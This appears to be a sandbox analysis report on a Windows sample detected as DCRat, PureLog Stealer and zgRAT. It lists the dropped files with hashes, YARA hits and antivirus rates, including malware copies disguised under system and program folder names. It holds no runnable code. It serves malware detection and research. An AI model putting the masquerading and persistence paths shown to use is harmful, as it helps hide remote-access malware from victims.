 | U1jaLbTw1f.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | voed9G7p5s.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | Etqq32Yuw4.exe | malicious | DCRat, PureLog Stealer, zgRAT |
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):277
                                                                                                                                                                  Entropy (8bit):5.765969487176301
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:TSLgMhL3yWhUBxvnvxrpkAaAx2vojRIih9f3KH0uzbn:TSLgYCWhMvoVvn06H1
                                                                                                                                                                  MD5:D708EB51AD6D51C081AA623B0EF3EA04
                                                                                                                                                                  SHA1:97E0BE4395FFF7184B1D0A1C5332AED0509534CC
                                                                                                                                                                  SHA-256:7CB0F270935C996425E8289DC3FE98EBE8622B5B7BF355D8C3BCABEB2CCACA36
                                                                                                                                                                  SHA-512:A7060C11EB8E51F0E8FCF3D7EFF307D8660212356CECE6CE7626FA47312CEA0DD654C529D6CD841C5F090E24E1C9643885D3B5A4B7A21A4B13A7E6DBC4BEB31F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:W32djJ5bf2K61EnyVT4l2k7RqIF8wGhM86rNuIIByE6wdjknj8pKOGYv6lwbE6pZU775XaDMK3wxoKyHhcZxaW72i5RJWr72ZgbfloQJ4d9VTkHvwo4lh1979FXbI4zd54YHtTg2LQ36Xli7ygWrwVVhgeffRyBAnfaZM9CdIBaQ8CkXganlhHqki0lOxAlXP2T1LJuze3jv5Ejd3H81KZdfyz0VYxpHZCBFtsMXpyHoi5oeRHVqCuNzZxCVTZbqNcW2CduL5lMVRz73KVEQc
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2615296
                                                                                                                                                                  Entropy (8bit):4.636841546952749
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:jTcFTu7e+WCw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtInx6t1:PcFn+gMcQmQmqycMxFNyn
                                                                                                                                                                  MD5:CDAC978772A7616686C0EFE2727CE902
                                                                                                                                                                  SHA1:B316852FE5B1C54C61FFEFAC1BC9032091D26CB0
                                                                                                                                                                  SHA-256:FCFB73997E95A7B8DFD22E302A1B18F8C7075A127BF33F7C9D8BC203984BCDF6
                                                                                                                                                                  SHA-512:0AEBDBCE0E3EB504DFA6E41D5CCC149FA5057E322333D3F10481B286A87C18813BDA72F81757BF563B38251DB4248D8695E64D37DB8464423FB2B68B20D55D35
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Yara Hits:
                                                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe, Author: Joe Security
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (574), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):574
                                                                                                                                                                  Entropy (8bit):5.889778793019252
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:EBtepFg3ad9TS5f3tvULtlmOYpn+8h7rA9VY6:atr3P/elUp37rAk6
                                                                                                                                                                  MD5:870A5B2FAF1DDC9FCEADFA701578D5C2
                                                                                                                                                                  SHA1:9899B50AA171ECF4AB8555118FAEC617C004E2F1
                                                                                                                                                                  SHA-256:A34187AF0AAFA30C82AEC709F917606753B44E7904D7977F5399F69A6843C41E
                                                                                                                                                                  SHA-512:7292111078EC1AFCE6E076028E1C00BB40E8E8D52A2A744D9ECA8529C17C0379ECE2BF46FA6596893321BF204835887E596E894F47EAF2ECBB0455F94E644755
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2615296
                                                                                                                                                                  Entropy (8bit):4.636841546952749
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:jTcFTu7e+WCw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtInx6t1:PcFn+gMcQmQmqycMxFNyn
                                                                                                                                                                  MD5:CDAC978772A7616686C0EFE2727CE902
                                                                                                                                                                  SHA1:B316852FE5B1C54C61FFEFAC1BC9032091D26CB0
                                                                                                                                                                  SHA-256:FCFB73997E95A7B8DFD22E302A1B18F8C7075A127BF33F7C9D8BC203984BCDF6
                                                                                                                                                                  SHA-512:0AEBDBCE0E3EB504DFA6E41D5CCC149FA5057E322333D3F10481B286A87C18813BDA72F81757BF563B38251DB4248D8695E64D37DB8464423FB2B68B20D55D35
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Yara Hits:
                                                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (468), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):468
                                                                                                                                                                  Entropy (8bit):5.865978360864279
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:puCaTdPyhNBUZwPgSH/8HYgwl7F6WXbiGs8JA3fl/uH3SWestD/3Rnnw86r/7TcH:ylyRoex0DUJsHZi2KnwD7mJ1n
                                                                                                                                                                  MD5:9C5D166543FE426D9D2DDA8DBFEF3C9D
                                                                                                                                                                  SHA1:20C380C3835A4F84DA9FB5DA14894F25429E4C74
                                                                                                                                                                  SHA-256:D444427416516FB94CF730562406CF4C1E1E1BF94C3DDB89FD6118FA62DD6583
                                                                                                                                                                  SHA-512:C0A9E89646F7F7DA8B1A701DB88D45A8FE09FD9EEA5D4958C3F1B9EB9F7B5586450737475386E92CFF93FCED8D85F8D25E31D1AEC7B918EB53178FA1A09FE197
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2615296
                                                                                                                                                                  Entropy (8bit):4.636841546952749
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:jTcFTu7e+WCw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtInx6t1:PcFn+gMcQmQmqycMxFNyn
                                                                                                                                                                  MD5:CDAC978772A7616686C0EFE2727CE902
                                                                                                                                                                  SHA1:B316852FE5B1C54C61FFEFAC1BC9032091D26CB0
                                                                                                                                                                  SHA-256:FCFB73997E95A7B8DFD22E302A1B18F8C7075A127BF33F7C9D8BC203984BCDF6
                                                                                                                                                                  SHA-512:0AEBDBCE0E3EB504DFA6E41D5CCC149FA5057E322333D3F10481B286A87C18813BDA72F81757BF563B38251DB4248D8695E64D37DB8464423FB2B68B20D55D35
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (619), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):619
                                                                                                                                                                  Entropy (8bit):5.900053593710004
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:BXU6TZSzdKKcwqM8z+aGnFYcodn3jnAH9ou2bGvJMhNWy5X292kyvg:C6TZSBGki+aQ3A3LAH9ot+M9J2jyI
                                                                                                                                                                  MD5:9155B87D1981B891E687F8CFD5FCE9F7
                                                                                                                                                                  SHA1:98ACDBD626D1BF40B5E8E7EA6AC6A9FABD4FD5F1
                                                                                                                                                                  SHA-256:1C15A10EA852CB4330E2C76FA9DEC026E148DA61D51900990E410065E4B32D51
                                                                                                                                                                  SHA-512:13762BBA2680DB24817C06649A79994624162763BC2BD5E743C0673C0778F7DC190236E604B6C24403B5A4E2AE31DEBBE325E45A909AF580374A2D1AE9F2A213
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2615296
                                                                                                                                                                  Entropy (8bit):4.636841546952749
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:jTcFTu7e+WCw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtInx6t1:PcFn+gMcQmQmqycMxFNyn
                                                                                                                                                                  MD5:CDAC978772A7616686C0EFE2727CE902
                                                                                                                                                                  SHA1:B316852FE5B1C54C61FFEFAC1BC9032091D26CB0
                                                                                                                                                                  SHA-256:FCFB73997E95A7B8DFD22E302A1B18F8C7075A127BF33F7C9D8BC203984BCDF6
                                                                                                                                                                  SHA-512:0AEBDBCE0E3EB504DFA6E41D5CCC149FA5057E322333D3F10481B286A87C18813BDA72F81757BF563B38251DB4248D8695E64D37DB8464423FB2B68B20D55D35
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                  Entropy (8bit):1.307335229380231
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvry:KooCEYhgYEL0In
                                                                                                                                                                  MD5:25F2ED8BAA47434228192827DC1CFC20
                                                                                                                                                                  SHA1:37DC6735B79D4352405EF139FCA9D881BB1CBC4F
                                                                                                                                                                  SHA-256:5BAD1C2CEE41CEF395E6D0F5FD440944C457C1E943FB367C223E9DC0183961D0
                                                                                                                                                                  SHA-512:B3017A4F806E1197A35EFF6C363560C7541A6952D6AFCCA7529A81836D3C8BED184D55D9622296BD54A5A9B6760B0086D17559E694F5B31B1DF1A3287B029219
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7e9ef21f, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                  Entropy (8bit):0.42212669716823814
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                                                                                                                                                                  MD5:9AF8A1ECF62E802651B061CAF9294E7D
                                                                                                                                                                  SHA1:165DB6293A20A16E87775C390F113552A3338EC3
                                                                                                                                                                  SHA-256:DFD3940B887D1704FA8C77C713276451CD3CA1AF3CDEBA3C2155C74A9D97FE59
                                                                                                                                                                  SHA-512:56C6A887B4F2666E44D52F5A142454447DD3A31D695CE7EE9D717A91F5765B7AE85472F9E3147924A041032740D0966DE766BCD5115B73B1E4A9CCB9874072DA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                  Entropy (8bit):0.0763974471616752
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:hyW8YeDJq+xjn13a/NJqlXallcVO/lnlZMxZNQl:hSzDJFx53q7Oewk
                                                                                                                                                                  MD5:FC932DC6019C63680A2FC99BEFE0342B
                                                                                                                                                                  SHA1:1A494923A104A192DF699CDE4246AF0289C2545E
                                                                                                                                                                  SHA-256:A1C0C6B5AD6054687D83C2A29989FC2A0BD80747DFBB517151FD00A295F43FB7
                                                                                                                                                                  SHA-512:EA10A53541D83272BA086451DEEB052D36AEE598FBB2726484FF69FB4CE301BEB2A7329D474761AED3205D4161F6B33DEB17905F0B3F3DC874680D4B1D8DC8F1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):277
                                                                                                                                                                  Entropy (8bit):5.83230028259679
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:jSkAzbryYmWWLUcYdUEeTtn8hREUhB82q8e4kBuoeXUXvAj6GcA3gO:jSkuNl/c6sqEQQ54kBIkvAu0QO
                                                                                                                                                                  MD5:5AA4ECD23BC09EDB453DD40FEC63CA35
                                                                                                                                                                  SHA1:10E43E3085677C24BF0F09CE7EE05E231CA16564
                                                                                                                                                                  SHA-256:AD931BEA02746DC936947503FA199775403128B49F6849DFFEB06A118AEEA4E9
                                                                                                                                                                  SHA-512:F43E6449775F5B3CD15AA503CA35A9FA4D5738BB894C7B7A5E0130C3AE73AB85C0E4EF8B21A4740A2689631472C73F732D6D2F814CC377E960DF84DB953CDED3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2uzm7oUU5ACPrqZ6Rd6ZPvFIVFBQI8McG4ybhZ4pCIJj5YAgGamKLgBHprR1mEL6yjJx17Y2jRWHlfM6FeJsWBRj3rw0HDC87NvWPNpIBtl4J3fJeVvH4djxSj3KLivgOYKXu0q2zAqmaWZ9LmWwR4Ddn7EqTe6d8FpvtHZno2S4w6X5J49jM8OUUquwvAjVDNoUroPDMsIZmJrqkJhYfXQ90VbDXm1nS60iSCNfo5Wd0zrK9DLmdK0q6oeWMLpk1eGqSIYi5BujAxJBnQETa
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2615296
                                                                                                                                                                  Entropy (8bit):4.636841546952749
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:jTcFTu7e+WCw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtInx6t1:PcFn+gMcQmQmqycMxFNyn
                                                                                                                                                                  MD5:CDAC978772A7616686C0EFE2727CE902
                                                                                                                                                                  SHA1:B316852FE5B1C54C61FFEFAC1BC9032091D26CB0
                                                                                                                                                                  SHA-256:FCFB73997E95A7B8DFD22E302A1B18F8C7075A127BF33F7C9D8BC203984BCDF6
                                                                                                                                                                  SHA-512:0AEBDBCE0E3EB504DFA6E41D5CCC149FA5057E322333D3F10481B286A87C18813BDA72F81757BF563B38251DB4248D8695E64D37DB8464423FB2B68B20D55D35
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Yara Hits:
                                                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Public\UserOOBEBroker.exe, Author: Joe Security
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1698
                                                                                                                                                                  Entropy (8bit):5.367720686892084
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1GqZ4x
                                                                                                                                                                  MD5:5E2B46F197ED0B7FCCD1F26C008C2CD1
                                                                                                                                                                  SHA1:17B1F616C3D13F341565C71A7520BD788BCCC07D
                                                                                                                                                                  SHA-256:AF902415FD3BA2B023D7ACE463D9EB77114FC3678073C0FFD66A1728578FD265
                                                                                                                                                                  SHA-512:5E6CEEFD6744B078ADA7E188AEC87CD4EE7FDAD5A9CC661C8217AC0A177013370277A381DFE8FF2BC237F48A256E1144223451ED2EC292C00811C14204993B50
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:NlllulJnp/p:NllU
                                                                                                                                                                  MD5:BC6DB77EB243BF62DC31267706650173
                                                                                                                                                                  SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                                                                                                  SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                                                                                                  SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
